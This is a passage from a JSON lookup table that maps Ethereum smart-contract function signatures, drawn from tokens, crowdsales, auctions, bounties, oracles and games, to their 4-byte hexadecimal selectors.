"0x172cf717", "right55(uint256)": "0x626d4a36", "left54(uint256)": "0x1687f112", "right54(uint256)": "0xe48e603f", "left53(uint256)": "0x559510d8", "right53(uint256)": "0x570a2a16", "left52(uint256)": "0x364ddb0e", "right52(uint256)": "0xbeca7440", "left51(uint256)": "0xe5f9ec29", "right51(uint256)": "0xb4174cb0", "left50(uint256)": "0xb3df8737", "right50(uint256)": "0x16eb6603", "left49(uint256)": "0x3fe97ead", "right49(uint256)": "0x355f51a0", "left48(uint256)": "0x361bb340", "right48(uint256)": "0xa6843f34", "left47(uint256)": "0x98129013", "right47(uint256)": "0x746fc8d0", "left46(uint256)": "0x62017ebc", "right46(uint256)": "0x706332d1", "left45(uint256)": "0x0f76de0d", "right45(uint256)": "0x55a5f702", "left44(uint256)": "0xc6715f81", "right44(uint256)": "0xa4083849", "left43(uint256)": "0x7e4eb35b", "right43(uint256)": "0x0bd9c534", "left42(uint256)": "0x62b6a282", "right42(uint256)": "0xdaacb24f", "left41(uint256)": "0x082d8f49", "right41(uint256)": "0x72a7c229", "left40(uint256)": "0xf7ed71d0", "right40(uint256)": "0xf1e6f4cd", "left39(uint256)": "0x2ca36da0", "right39(uint256)": "0x7adaa3f8", "left38(uint256)": "0x392d42ae", "right38(uint256)": "0x2a85a45d", "left37(uint256)": "0x40c3b187", "right37(uint256)": "0x9acb1ad4", "left36(uint256)": "0xbf8981c0", "right36(uint256)": "0xa57544da", "left35(uint256)": "0x526938f8", "right35(uint256)": "0x2d0f5573", "left34(uint256)": "0xcdbdf391", "right34(uint256)": "0x487cd86f", "left33(uint256)": "0x9ef6ca0f", "right33(uint256)": "0x261de7c4", "left32(uint256)": "0x46be2e0c", "right32(uint256)": "0x70ac4bb9", "left31(uint256)": "0x39a87bd9", "right31(uint256)": "0x8defbc5e", "left30(uint256)": "0x2632924d", "right30(uint256)": "0x5dca53d3", "left29(uint256)": "0x090bf3b7", "right29(uint256)": "0x79254bb8", "left28(uint256)": "0x14d07a3e", "right28(uint256)": "0x50500934", "left27(uint256)": "0x4a0f5974", "right27(uint256)": "0xf0f21344", "left26(uint256)": "0x404efc53", "right26(uint256)": "0xabde33f7", "left25(uint256)": "0xd959e244", "right25(uint256)": "0x3cf0659a", "left24(uint256)": "0x66d7ffde", "right24(uint256)": "0xdfb9560c", "left23(uint256)": "0x2d978678", "right23(uint256)": "0x140dcec4", "left22(uint256)": "0xd5ec7e1d", "right22(uint256)": "0xf75165c6", "left21(uint256)": "0xd1835b8c", "right21(uint256)": "0x4689ab4d", "supplyRest()": "0x598ab2c9", "lastBlock_a14()": "0x21848580", "ong()": "0x93dfea8f", "RPEICO_TOKEN_SUPPLY_LIMIT()": "0x7923715b", "leftSharePriceRateOfIncrease()": "0xba95d63a", "china()": "0xd8f2f09f", "TRANSFERABLE()": "0x1bfd6814", "socWarefareAddr()": "0x4cb532db", "wingsETHRewardsPercent()": "0xb369940c", "CITY_PRICE()": "0xb5cc916c", "donor()": "0x25223bd4", "devcon2Token()": "0x57b8e8c3", "BONUS_100_250()": "0x8713d931", "NorthPoleAddress()": "0xd015f6dd", "SerpentCountDown()": "0x34d55cd9", "bitcoinContract()": "0x81fcef3c", "satoeContract()": "0x815eb7c1", "MAX_DEPARTURE_LIM()": "0x2dccba89", "etapAddressesLimit()": "0xaba46a93", "EARLY_CONTRIBUTOR_STAKE()": "0x1307d2d7", "STRTToEth()": "0x202d5123", "claimH1()": "0x08edf505", "crowdsaleEndBlock()": "0x7f298f93", "presaleTokenLimit()": "0x28ff498a", "getEachBindAddressAccount()": "0x7383d8ee", "mtrContractAddress()": "0x89800cc2", "ratePerWeiInPreICO()": "0xb9e5e2c4", "initialFoundersAmount()": "0x4d39ed06", "mNumVoters()": "0xd454f92e", "seeMyNumbers()": "0x80f4ab5f", "rateSecondTier()": "0xc5f39cd7", "PRICE_MUL()": "0xf68e63e3", "preMarketingSharesDistributed()": "0x731e1ecd", "IndexOfCurrentDraw()": "0xbfeb049c", "weisHardCap()": "0xbae3791e", "ORACLIZE_GAS()": "0x45668f2b", "withdrawalTime()": "0x389eb9f9", "show_The_name_of_option_C()": "0x657ba57b", "capitalRaisedTarget()": "0x85daafe6", "rootHash()": "0x1d80009a", "mintFeeDenominator()": "0x5db07aee", "GET_METADATA()": "0x65181ad3", "reopenSale()": "0xf88001d4", "DICE()": "0x92f52ddf", "completeBountyDistribution()": "0x354f1651", "ownerTwo()": "0x83aa9985", "startFrom()": "0x208904c7", "minCapTokens()": "0xef0dd241", "SALE_END_TIME()": "0x20a0045a", "SecondBonus()": "0xaba8dfbd", "amountOfTokensPoolA()": "0x3ceeafa7", "fibokenCreatedCount()": "0x7d1b2666", "TOKEN_COMPANY_OWNED()": "0xf554e934", "perDeadLine()": "0xa087ac0c", "tokensMintedForSale()": "0x0fb4b070", "tokenBurner()": "0x2996f972", "totalSupplyCap()": "0xbb102aea", "teamVaultAddr()": "0x93e24b7a", "finanReserveWallet()": "0xa544f062", "minbid()": "0xd2ba8073", "RESERVED_TEAM_LOCKED_SIDE()": "0xf297109d", "fcontr()": "0x74479db0", "ownerEth()": "0x9f223167", "creationTime()": "0xd8270dce", "ownerPercent()": "0x95d12000", "question()": "0x3fad9ae0", "round2()": "0x532b581c", "getNumeroCeldas()": "0xd088f50d", "futureDevelopment()": "0xa2948cdf", "PURCHASER_MIN_TOKEN_CAP()": "0x28675325", "priceByPeriod()": "0xbaa6ab81", "phaseOneCap()": "0x52bca4c3", "exchFee()": "0xc668f71b", "THIRTY_DAYS()": "0xa21df9f0", "EXPECTED()": "0x4a681b1b", "balanceTeam()": "0x73e58a75", "MINER_STAKE()": "0x5c314df0", "getLastData()": "0xb0ac4c8c", "ICO_ON()": "0x49582509", "coinMaster()": "0xe3f0920a", "minimalWei()": "0x1fc05f86", "END_DATE()": "0x545599ff", "rspToken()": "0x7d9201cc", "AMBASSADOR_FIVE()": "0xf71c60bd", "warning()": "0xcf0682bc", "week2Price()": "0xe23d0b23", "assignRevenueContract()": "0xec67e37a", "MAX_UN_LOCK_TIMES()": "0x92c70af1", "phase3Duration()": "0x2bd5e353", "ethRaisedAddress()": "0x1d8a8db9", "totalTokensSent()": "0xac1559d2", "rubusOrangeAddress()": "0x1f9c564f", "exchangeableTokens()": "0x72e6e21a", "REFUNDSACTIVE()": "0x1fbd9a0b", "creatorsAddress()": "0x25cbeb7e", "tokenMigrated()": "0x6fe3a567", "weiTotal()": "0xe6dc85a3", "SEEDS_TO_HATCH_1RICE()": "0x436ee4af", "secondReleaseTime()": "0x938da22d", "getBattleFee()": "0xfb2ee901", "getTopics()": "0xfee01177", "getParentBranch()": "0x8238520f", "testDeductCoin()": "0x08ec17a2", "testDefaultWallet()": "0x358455b4", "testConstructorUsingNewContract()": "0x20eeba1f", "onetimeLaunch(uint256)": "0x1be88614", "transferWallet(address)": "0xd8cba0ba", "tokenSweep(address,address)": "0x5538210e", "checkWhale(uint256)": "0x74b10ae5", "checkEarlybird(uint256)": "0xa8b88268", "checkThreshold(uint256)": "0xdafae408", "buyTokensBonus(uint256,uint256)": "0x332ad859", "DonorCrowdsale(uint256,uint256,uint256,address,uint256)": "0xd176be98", "test_invalidThrowWithAsserts()": "0x750852b3", "test_invalidThrow()": "0x89f37c45", "test_basicWithTwoAssertAfterThrow()": "0x5b135806", "test_basicWithTwoAssertThrow()": "0x0b0c2e80", "test_basicWithAssertBeforeThrow()": "0x9d74b959", "test_basicThrow()": "0x4f0a97b9", "test_startNumber()": "0xeda5d80b", "test_startBool()": "0x99d52baf", "services(uint256)": "0xc22c4f43", "deactivateKey(string)": "0x02d800ec", "set(string,string,uint256)": "0x47c81699", "ETHRLINK(address,address)": "0xecf42e5a", "setLastMaxInvestments(uint256)": "0xfe8fb49f", "STQCrowdsaleTestHelper(address[],address,address,address)": "0x5d5a1614", "getTotalAmountOfTokens(uint256)": "0xa5ddfef1", "totalEnjSold()": "0x4bce2e9b", "processContribution(address)": "0xa78a651a", "contributeETH(address)": "0xff36cf59", "deliverPresaleTokenToClient(address,uint256)": "0xa524ce4f", "deliverPresaleTokens(address[],uint256[])": "0x18b7fed8", "changeBeneficiary(address)": "0xdc070657", "ENJCrowdfund(uint256,address)": "0x2c08ab0c", "setResults(address,uint256,uint256[2])": "0x850a2e78", "Player()": "0x045820b3", "generateFileID(string,string,string,string)": "0x887240d0", "getCurrentPageCount()": "0x800c7e38", "getCurrentPageSize()": "0xe9e69a48", "getGroupFileCount(string)": "0xffcad44e", "getGroupPageCount(string)": "0x88d97c30", "pageByGroup(string,uint256)": "0x310eff5d", "pageFiles(uint256,uint256)": "0xda421df5", "FileInfoManager()": "0x83234aa6", "AscToken(address)": "0x14fc7b9d", "lock(bool)": "0x0dd0a042", "changeEmissionContractAddress(address)": "0x03562dbb", "getInitialized()": "0xee89dab4", "SwissBit(uint256)": "0x2405b1a3", "setMessage(string)": "0x368b8772", "getTotalGas()": "0x64326c71", "getLastCaller()": "0x880b36e7", "payNode(bytes32,uint32)": "0xf15beecf", "createDApp(bytes32,uint32,bytes,bytes32)": "0x74609d0c", "getAllLawyers()": "0x9249d865", "getLawyerAtIndex(uint256)": "0x068ea2aa", "getLawyerCount()": "0x655dc4c2", "updateCase(address,uint256)": "0x40d84b52", "isLawyer(address)": "0x5939a84e", "deleteLawyer(address)": "0x44fa961d", "insertLawyer(address,uint256)": "0x99091c93", "transferFrom(uint256,uint256)": "0x0643be3e", "checkTip(uint8)": "0x1282467d", "calculateOdds(uint8)": "0xe2725161", "finalizeBet(uint8)": "0x09598dfd", "SportsBet(string,uint256)": "0x43c6d558", "unPause()": "0xf7b188a5", "setTotalCoins(uint32)": "0x894766dd", "adjustTotalCoins(int32)": "0x6171d7fc", "setCoinLimit(uint32)": "0x5da05e2e", "GxCoinTotals(address)": "0x63a24174", "setGasReq(uint256)": "0x6c71b1aa", "mastery(address)": "0x59c14cf1", "mastery()": "0x27d1f39e", "maker(address)": "0xcbb31da9", "EthMatch(uint256)": "0xcea876ba", "getSetting(uint256)": "0x40b43701", "genEvent()": "0xdd0f0808", "getSetting()": "0x5056b309", "ContractWithParams(address)": "0xb8c26d0b", "clearing()": "0x027cb7c6", "setEnergyCost(uint256)": "0xa91c39a9", "setAccount(address,uint256)": "0xcb6890d9", "getWarrantyPrice(address,uint256,uint256,uint256)": "0xd9bccfd6", "initialized()": "0x158ef93e", "getInitializationBlock()": "0x8b3dd749", "GxConstants()": "0x219356bc", "ViewtMyBets()": "0x698bdd6f", "ViewBetByID(uint256)": "0xcda4351b", "BetMe(address,uint256)": "0xe5f9f510", "CreateABet(address,uint256)": "0xe028222f", "MyBetting()": "0x821e2491", "internalTransfer(address,address,uint256)": "0x59e026f7", "setStakeRate(bytes32,uint256)": "0x60fdd1c9", "setMinStake(bytes32,uint256)": "0xed9f18fb", "setProvider(bytes32,address)": "0x4a7987a2", "blockN()": "0xa52dc2e7", "permissionHash(address,address,bytes32)": "0xd612cff5", "roleHash(address,bytes32)": "0x908ab6a5", "getCat(uint256)": "0x4da2b48e", "doSuicide()": "0x3a24d701", "changeTarget(address)": "0xdcf7bb5c", "target()": "0xd4b83992", "blocks(uint256)": "0xf25b3f99", "getTopBlock()": "0xde12b52c", "mkhash(uint256,uint256,bytes32,string)": "0xb4755160", "pushBlock(uint256,uint256,bytes32,bytes32,string)": "0x9e750316", "getBlock(uint256)": "0x04c07569", "getComment(uint256)": "0x0800e300", "numComments()": "0xb85a6a20", "addComment(string,address,bool,uint256)": "0xf03b7c70", "getNumFulfillments(uint256)": "0xfbe334f8", "getNumBounties()": "0x3278ba2f", "getBountyToken(uint256)": "0x19dba3d2", "getBountyData(uint256)": "0xa60745aa", "getBountyArbiter(uint256)": "0x86647bac", "getBounty(uint256)": "0xee8c4bbf", "getFulfillment(uint256,uint256)": "0xb94b0a3a", "increasePayout(uint256,uint256,uint256)": "0x422d4cd6", "changeBountyPaysTokens(uint256,bool,address)": "0x992a3e75", "changeBountyArbiter(uint256,address)": "0xcdad6576", "changeBountyFulfillmentAmount(uint256,uint256)": "0x452ccadb", "changeBountyData(uint256,string)": "0xf3d3402a", "changeBountyDeadline(uint256,uint256)": "0xd6c0ceab", "transferIssuer(uint256,address)": "0x5d19606e", "extendDeadline(uint256,uint256)": "0x2d1fdef6", "killBounty(uint256)": "0x16b57509", "acceptFulfillment(uint256,uint256)": "0xd9583497", "updateFulfillment(uint256,uint256,string)": "0x41ac5dd0", "fulfillBounty(uint256,string)": "0x1e688c14", "activateBounty(uint256,uint256)": "0x626a413a", "contribute(uint256,uint256)": "0x8c590917", "issueAndActivateBounty(address,uint256,string,uint256,address,bool,address,uint256)": "0x7e9e511d", "issueBounty(address,uint256,string,uint256,address,bool,address)": "0x788acd7e", "StandardBounties(address)": "0x07f9f7ba", "TihoToken(uint256,string,uint8,string)": "0xdfef54a3", "averageGen0SalePrice()": "0xeac9d94c", "nonFungibleContract()": "0xdd1b7a0f", "getCurrentPrice(uint256)": "0xc55d0f56", "cancelAuction(uint256)": "0x96b5a755", "gen0SaleCount()": "0x8a98a9cc", "cancelAuctionWhenPaused(uint256)": "0x878eb368", "isSaleClockAuction()": "0x85b86188", "ownerCut()": "0x83b5ff8b", "getAuction(uint256)": "0x78bd7935", "withdrawBalance()": "0x5fd8c710", "lastGen0SalePrices(uint256)": "0x484eccb4", "bid(uint256)": "0x454a2ab3", "createAuction(uint256,uint256,uint256,uint256,address)": "0x27ebe40a", "testCalculateItemId()": "0xc512d1d1", "calculateItemId(bytes32)": "0x0fa48688", "mixGenes(uint256,uint256,uint256)": "0x0d9f5aed", "mixGenes(uint256,uint256)": "0x8d8b1b88", "isGeneScience()": "0x54c15b82", "close(address,uint32,uint192,bytes)": "0xe003604e", "topUpERC20(address,uint32,uint192)": "0xce90bafa", "token_address(address)": "0xe65e95a8", "getKey(address,address,uint32)": "0x803c8383", "verifyBalanceProof(address,uint32,uint192,bytes)": "0x6c68c837", "settle(address,uint32)": "0x5a8e9d66", "createChannelERC20(address,uint192)": "0x5989c283", "close(address,uint32,uint192,bytes,bytes)": "0x4f07a663", "getChannelInfo(address,address,uint32)": "0x0eba6b06", "getBalanceMessage(address,uint32,uint192)": "0x0ac7c7ba", "challenge_period()": "0x0a00840c", "transferOtherToken(address,address,uint256)": "0x9df1e2b0", "mint(int256)": "0xbdbaae63", "reserveFullMintAllowance(int256)": "0x07b6b762", "mintAllowance(int256)": "0xe1d001eb", "oobiqoo(address)": "0xabbadf55", "sweep(address,bytes32)": "0x8a738683", "cancel(address,bytes32)": "0x9e2ed686", "Cancelot(address,address)": "0xce3a7076", "test(uint256)": "0x29e99f07", "tgeSettingsChange(uint256,uint256)": "0x49573edd", "deleteResponse(uint256)": "0x6d6dcbe7", "getResponseError(uint256)": "0x81b3ea13", "getResponseString(uint256,bytes32)": "0x601570ea", "getResponseUint(int256,uint256,bytes32)": "0x9745ac4d", "getResponseQueryType(uint256)": "0x6cd98f30", "executeRequest(uint256)": "0x6e417c69", "addArgumentToRequestString(uint256,bytes32,bytes32)": "0x41a70b4c", "addArgumentToRequestUint(int256,uint256,bytes32,uint256)": "0xbadae9b4", "ping()": "0x5c36b186", "getNonce(address)": "0x2d0335ab", "relayMetaTx(uint8,bytes32,bytes32,address,bytes)": "0xb4fadcad", "checkMessageData(address)": "0x417a7d60", "MetaIdentityManager(uint256,uint256,uint256,address)": "0x40d32df9", "isRecovery(address,address)": "0x11fe12b3", "isOlderOwner(address,address)": "0x32967ea0", "isOwner(address,address)": "0x7ddc02d4", "registerIdentity(address,address)": "0x781f5a83", "createIdentity(address,address)": "0xd10e73ab", "IdentityManager(uint256,uint256,uint256)": "0x28acb520", "testGetAbiVersion()": "0x67cab29d", "getAbiVersion()": "0xce6342f3", "testFailRegisterContractIdAgain()": "0xd1b5e2be", "testControlRegisterContractIdAgain()": "0xc9c1ed93", "setMigrationInfo(string)": "0xab1f7929", "calculateIdeaBuy(uint256,uint256)": "0x066e4748", "getMyIdeas()": "0x011d07c0", "withdrawal_delay()": "0xeaa26f0f", "agtAtnReceived()": "0xb512e8a6", "gasRequired()": "0xb37983e2", "depositId()": "0x9852099c", "startDeposit()": "0x79df4fa2", "depositStopTime()": "0x73c4942a", "changeGasRequired(uint256)": "0x70c33b31", "withdrawATN(address)": "0x64571245", "atnSent()": "0x6097bca9", "depositStartTime()": "0x587419d5", "records(address)": "0x469e9067", "batchWithdraw(address[])": "0x431cc3dd", "tokenFallback(address,uint256)": "0x3b66d02b", "changeDepositStopTimeFromNow(uint256)": "0x3ad17019", "withdrawId()": "0x36d43c24", "ATN()": "0x2dd522c6", "AGT()": "0x256738d1", "pool()": "0x16f0115b", "withdrawATN()": "0x0e69890f", "DEPOSIT_WINDOW()": "0x05c0dd91", "tokenURI(uint256,string)": "0x41dcf454", "symbol(string)": "0x41bb0559", "isConfirmed(bytes32,address,address)": "0xf9ebdc8b", "cancelChangeOracle()": "0xedc423e6", "addSigner(address)": "0xeb12d61e", "getSignerFlagFor(address)": "0xe96a6b38", "confirmChangeOracle()": "0xe0607290", "getConfirmations(bytes32,address)": "0xdceb3e7d", "pendingOracleB()": "0xd2625fce", "isPendingOracle(address)": "0xd205bcb0", "confirmBySigner(bytes32,address)": "0xcbb1d761", "getOperation(address)": "0xc0887991", "isOracle(address)": "0xa97e5c93", "oracleB()": "0x9bdff8eb", "isB(address)": "0x82731247", "consumeOperation(bytes32,uint256)": "0x809b296d", "oraclesCount()": "0x76f70900", "isPendingA(address)": "0x67221df0", "getPendingOracleFor(address)": "0x4ccc4c36", "confirm(bytes32,address,uint256,uint8,bytes32,bytes32)": "0x4a96712e", "changeOracle(address)": "0x47c421b5", "pendingOracleA()": "0x41f65507", "confirmMany(bytes32[],address[],uint256[],uint8[],bytes32[],bytes32[])": "0x3d6ea8b2", "signerConsumerNonce(address,address)": "0x25b64bba", "isA(address)": "0x24355ea6", "oracleA()": "0x1670cb6f", "removeSigner(address)": "0x0e316ab7", "signerFlag(address)": "0x03d231b5", "forwardWithRevert(address,uint256,bytes)": "0xf86db133", "actOnBehalf(bytes,uint256,uint8,bytes32,bytes32)": "0xdbdd5ae6", "nextNonce()": "0xd69c3d30", "disableSecureMode()": "0xce39952a", "enableSecureMode()": "0xc5ea6256", "alwaysRequireCosignature()": "0xb72ceab8", "forwardOnBehalfWithRevert(address,uint256,bytes,uint256,uint8,bytes32,bytes32)": "0x8813304b", "granted(address)": "0x85aa6e09", "doNotAlwaysRequireCosignature()": "0x837356b1", "forwardOnBehalf(address,uint256,bytes,uint256,uint8,bytes32,bytes32)": "0x72262699", "cosigner()": "0x681232ad", "lastNonce()": "0x52631ab4", "confirmAndForwardOnBehalfWithRevert(address,uint256,bytes,bytes32,uint256[2],uint8[2],bytes32[2],bytes32[2])": "0x4815ccea", "constructor(address,address)": "0x4525f804", "initInsecure(address)": "0x3f48ae1a", "confirmAndForwardOnBehalf(address,uint256,bytes,bytes32,uint256[2],uint8[2],bytes32[2],bytes32[2])": "0x3a15021a", "confirmAndForward(address,uint256,bytes,bytes32,uint256,uint8,bytes32,bytes32)": "0x2c39d855", "isCosignerSet()": "0x2a2fe110", "confirmAndForwardWithRevert(address,uint256,bytes,bytes32,uint256,uint8,bytes32,bytes32)": "0x05c7cd4b", "ambi2()": "0xf01b896f", "proxy()": "0xec556889", "_performTransferFromToICAPWithReference(address,bytes32,uint256,string,address)": "0xeb58705b", "_performApprove(address,uint256,address)": "0xe34f7137", "_performGeneric(bytes,address)": "0xdb00b848", "_performTransferFromWithReference(address,address,uint256,string,address)": "0xcca97025", "_performTransferToICAPWithReference(bytes32,uint256,string,address)": "0xc10796df", "_returnReturnData(bool)": "0xb2c5b208", "transferToICAPWithReference(string,uint256,string)": "0x9ab253cc", "_assemblyCall(address,uint256,bytes)": "0x98d4cacb", "transferFromToICAPWithReference(address,string,uint256,string)": "0x84c5c34d", "transferToICAP(string,uint256)": "0x81d434e9", "setupAmbi2(address)": "0x7a386e88", "transferFromToICAP(address,string,uint256)": "0x7609c5a9", "isICAP(address)": "0x307e38ca", "_performTransferWithReference(address,uint256,string,address)": "0x1962df71", "getItemUri(uint256)": "0xb67d4111", "setItemRangeURI(uint256,string)": "0xa6069146", "getOwnersItemList(address)": "0xbefc5c32", "itemOfOwnerByIndex(address,uint256)": "0xb21e4ebd", "getItemByIndex(uint256)": "0xfc325efd", "setPlatform(address)": "0x6945c5ea", "initNameSymbol(string,string)": "0x2999c76b", "tokenIdByIndex(uint256)": "0xeacde2cb", "ownersTokenList(address,uint256)": "0xbd49f00f", "getRangeURI(uint256)": "0xbce94649", "getOwnersTokenIndex(address,uint256)": "0xa4f4662f", "getRangeID(uint256)": "0x69a300f6", "tokenIndexById(uint256)": "0x4c1d9d48", "platform()": "0x4bde38c8", "ownersTokenIndex(address,uint256)": "0x3bc4be52", "isLiquidating()": "0x97f58e91", "priceIsStale()": "0xffb1a06d", "saleProceedsEtherAllowStale(uint256)": "0xeb4f17e7", "saleProceedsEther(uint256)": "0x2d68bc6e", "saleProceedsFiat(uint256)": "0x658c55ed", "purchaseCostEther(uint256)": "0xc794ef10", "purchaseCostFiat(uint256)": "0xba9ea413", "poolFeeIncurred(uint256)": "0xf43bac53", "_nominCap()": "0x7edd9060", "collateralisationRatio()": "0x2c5f5234", "etherValueAllowStale(uint256)": "0xa749870d", "etherValue(uint256)": "0xe0179e6c", "fiatBalance()": "0x649f0153", "fiatValue(uint256)": "0x9b67bfa3", "setStalePeriod(uint256)": "0xa6f4ab2e", "setPoolFeeRate(uint256)": "0x27b4e228", "donateToFeePool(uint256)": "0x63ff6125", "withdrawFee(address,uint256)": "0xfd9be522", "_transferFrom_byProxy(address,address,address,uint256)": "0x3d26851a", "_transfer_byProxy(address,address,uint256)": "0xedde6407", "feePool()": "0xae2e933b", "priceToSpend(uint256)": "0xe3f310c7", "transferPlusFee(uint256)": "0x45df30d2", "transferFeeIncurred(uint256)": "0xda46e6c4", "setFeeAuthority(address)": "0x8a957929", "vetoMotion(uint256)": "0x00b2516d", "approveMotion(uint256)": "0xb25c22b2", "closeMotion(uint256)": "0x9084f1f9", "_closeMotion(uint256)": "0x7da0e079", "cancelVote(uint256)": "0xbacbe2da", "setupVote(uint256)": "0x73b1184e", "beginMotion(address)": "0x32b525bb", "hasVoted(address,uint256)": "0x42545825", "motionPasses(uint256)": "0x0495cad9", "motionWaiting(uint256)": "0x6dec665e", "motionConfirming(uint256)": "0x63cdcc57", "motionVoting(uint256)": "0xebfed9f2", "setRequiredMajority(uint256)": "0xcc7f593c", "setRequiredParticipation(uint256)": "0x5b8aa811", "setConfirmationPeriod(uint256)": "0xbea50ae3", "setVotingPeriod(uint256)": "0xea0217cf", "setMinStandingBalance(uint256)": "0x0d7c064f", "intToDec(uint256)": "0x3df19507", "safeDiv_dec(uint256,uint256)": "0x0a639ed1", "divIsSafe(uint256,uint256)": "0x474154bc", "safeMul_dec(uint256,uint256)": "0x23b8feb0", "mulIsSafe(uint256,uint256)": "0x2a0bb7ea", "subIsSafe(uint256,uint256)": "0x3e803343", "addIsSafe(uint256,uint256)": "0x305997c8", "setMessageSender(address)": "0xbc67f832", "Proxyable(address)": "0x3855cf0e", "_setTarget(address)": "0x436962b4", "LimitedSetup(uint256)": "0x80780801", "getEtherDog(uint256)": "0xec4fd09d", "EtherDogCore()": "0x56b86bc2", "createDefaultEtherDog(uint256,uint256,uint256,address,uint256,uint256)": "0x2e5cc103", "createDefaultGen0EtherDog(uint256,address,uint256,uint256)": "0x68ab3db2", "_createEtherDogWithTime(uint256,uint256,uint256,uint256,address,uint256,uint256)": "0x36422e49", "_createEtherDog(uint256,uint256,uint256,uint256,address)": "0xa4cae72b", "Cow()": "0xff2eff94", "claimBeercoins()": "0xb6f46b61", "GuardedBeercoinICO()": "0x147bfd66", "AZEEMCOIN(uint256,string,string)": "0x06621ff6", "WOB(uint256,string,string)": "0x8644ddd9", "DiscToken()": "0x081f9190", "chefOwnerWithdrawal()": "0xc93ce90f", "chefBalanceOf(address)": "0xa96948c6", "ChefICO()": "0x43acb067", "EmporeumToken()": "0x43c3658e", "boom(address)": "0x668a2f67", "W()": "0xdb624887", "deliver(uint256,uint256)": "0x7b8ac66b", "post(address,uint256)": "0xd648d7fd", "update_fee(uint256,uint256)": "0x3f89b09c", "get_mail(uint256)": "0x044ec699", "mails_to_deliver()": "0x908e2f06", "Postman()": "0xc1d66482", "Bullexi()": "0xca209c8b", "getColors(uint32)": "0xcc79eaf0", "setColors(uint32[],uint8[])": "0xfeee8139", "pixelgrid()": "0x26cf9165", "PDAToken()": "0x93107071", "ticketsOf(address)": "0x31657926", "voteAll(address)": "0xb84fe73b", "distributeMultiple(address[],uint256[])": "0xb319e9fa", "setKpopCelebContractAddress(address,address)": "0xdfdc99c7", "setDividend(uint256)": "0xe091f453", "transferToWinner(address,address,uint256)": "0xd25dc056", "setManufacturer(address)": "0xc11dde0d", "updateItem(uint256,string,uint256[6])": "0x55e40d98", "createItem(string,uint256,uint256,address,uint256[6])": "0x56fadf8e", "celebOf(uint256)": "0x6d06bf0d", "KpopItem()": "0x768549aa", "VHW()": "0x15263ef7", "DTCC_ILOW_6()": "0xe4e713e0", "KarmaToken()": "0xd3471035", "SendEtherToAsset(uint256)": "0xa55168ea", "Migrate()": "0x207aba24", "getMTUBal(address)": "0xeb6192a9", "NONEC()": "0x14c3e29f", "getPublishedTokens(address)": "0x0b8021c4", "publishedTokenOfOwnerByIndex(address,uint256)": "0xc435d2ac", "publishedCountOf(address)": "0x9bc706e8", "getAllTokens()": "0x2a5c792a", "getOwnedTokens(address)": "0xd9d61655", "getIpfsHashToTokenId(string,string)": "0x086282b9", "setPreUri2(string)": "0x536cb736", "setPreUri1(string)": "0x14a26806", "setPublisherCut(uint128)": "0x9938b0de", "setCreateDigitalArtFee(uint128)": "0xaa6f5bb6", "DigitalArtChain()": "0x372a2a36", "_lower(bytes1)": "0x87196863", "_upper(bytes1)": "0x7df5f4ae", "lower(string)": "0x84b2e59d", "upper(string)": "0x7e9ad046", "compareToIgnoreCase(string,string)": "0xf9ce67dd", "compareTo(string,string)": "0x7d1a6e3f", "split(string,string)": "0x8bb75533", "_substring(string,int256,int256)": "0xa586fd0f", "substring(string,int256)": "0x8f0563b9", "_indexOf(string,string,uint256)": "0x26f86791", "toByte(uint8)": "0xa86b73f0", "finishDistribution()": "0x9b1cbccc", "EDD()": "0x075fe66a", "distr(address,uint256)": "0x34e24640", "burnFrom(address,uint32)": "0xf62ee1af", "burn(uint32)": "0x7a5984c4", "approveAndCall(address,uint32,bytes)": "0x2c9868df", "approve(address,uint32)": "0xa7e94542", "transferFrom(address,address,uint32)": "0x84269ed9", "transfer(address,uint32)": "0x80097484", "_transfer(address,address,uint32)": "0xea595672", "TokenERC20(uint32,string,string)": "0xbbcb4e3a", "receiveApproval(address,uint32,address,bytes)": "0xeb83e2b5", "RedlineFinancialLabCoin()": "0x15c2eed8", "isEntitledForCluster(address)": "0x02a59ea3", "Drain()": "0xd67a073f", "claimSegments()": "0x8b57ebc6", "claimClusters()": "0xb99f1d02", "buyClusterToken()": "0x953b42b3", "currentUnit()": "0x0a027825", "currentSegment()": "0x99b465cb", "currentCluster()": "0xb281c478", "ClusterToken()": "0x3c64f9aa", "keccak(address,address,uint256)": "0x74f1d6ce", "isValidSignature(bytes32,uint8,bytes32,bytes32)": "0x8b257d3d", "withdraw(uint8,bytes32,bytes32,uint256,uint256)": "0x9a0d6247", "WrapperLock(address,string,string,uint256,address)": "0x56c4b246", "startSale(uint256)": "0x0e3ab61d", "sendTokensToSevenAddresses(address,address,address,address,address,address,address,uint256)": "0xf5a647aa", "sendTokensToOneAddress(address,uint256)": "0xb1cf404b", "AirDropAFTK5May()": "0x20c55a8a", "setNumeratorDenominator(uint256,uint256)": "0x34ea5fe5", "setReceiver2(address)": "0xdbf724c7", "setReceiver1(address)": "0x03c13148", "withdrawTo(uint256,address)": "0xc86283c8", "getCCH_edit_34()": "0x9e845173", "setCCH_edit_34(string)": "0x4170a419", "getCCH_edit_33()": "0x01114d74", "setCCH_edit_33(string)": "0x2ebfeaac", "getCCH_edit_32()": "0xf1280c23", "setCCH_edit_32(string)": "0xb975d9c7", "getCCH_edit_31()": "0xa415b8eb", "setCCH_edit_31(string)": "0x7f15a6a3", "getCCH_edit_30()": "0x0759a351", "setCCH_edit_30(string)": "0x52108d4c", "getCCH_edit_29()": "0x5169ed0e", "setCCH_edit_29(string)": "0x32f7b41b", "getCCH_edit_28()": "0x193a8a83", "setCCH_edit_28(string)": "0xfcd830c4", "getCCH_edit_27()": "0x7930acd6", "setCCH_edit_27(string)": "0x97fe9129", "getCCH_edit_26()": "0x14704d91", "setCCH_edit_26(string)": "0x8b048645", "getCCH_edit_25()": "0x9acfb1a8", "setCCH_edit_25(string)": "0x4649bfee", "getCCH_edit_24()": "0xcac98d6d", "setCCH_edit_24(string)": "0x1447431e", "getCCH_edit_23()": "0x03071302", "setCCH_edit_23(string)": "0xc0d470a6", "getCCH_edit_22()": "0xe8ae7dd2", "setCCH_edit_22(string)": "0x6d338bd0", "getCCH_edit_21()": "0x1afcc95b", "setCCH_edit_21(string)": "0x1c0d1274", "getCCH_edit_20()": "0x2eea1efe", "setCCH_edit_20(string)": "0x64d34045", "getCCH_edit_19()": "0x332e25be", "setCCH_edit_19(string)": "0x834c6c84", "getCCH_edit_18()": "0x4f0b584e", "setCCH_edit_18(string)": "0x6497d32e", "getCCH_edit_17()": "0x521c82be", "setCCH_edit_17(string)": "0x9b4a7fe9", "getCCH_edit_16()": "0x6bacfe43", "setCCH_edit_16(string)": "0xa98af238", "getCCH_edit_15()": "0xe8ef51db", "setCCH_edit_15(string)": "0xe248b435", 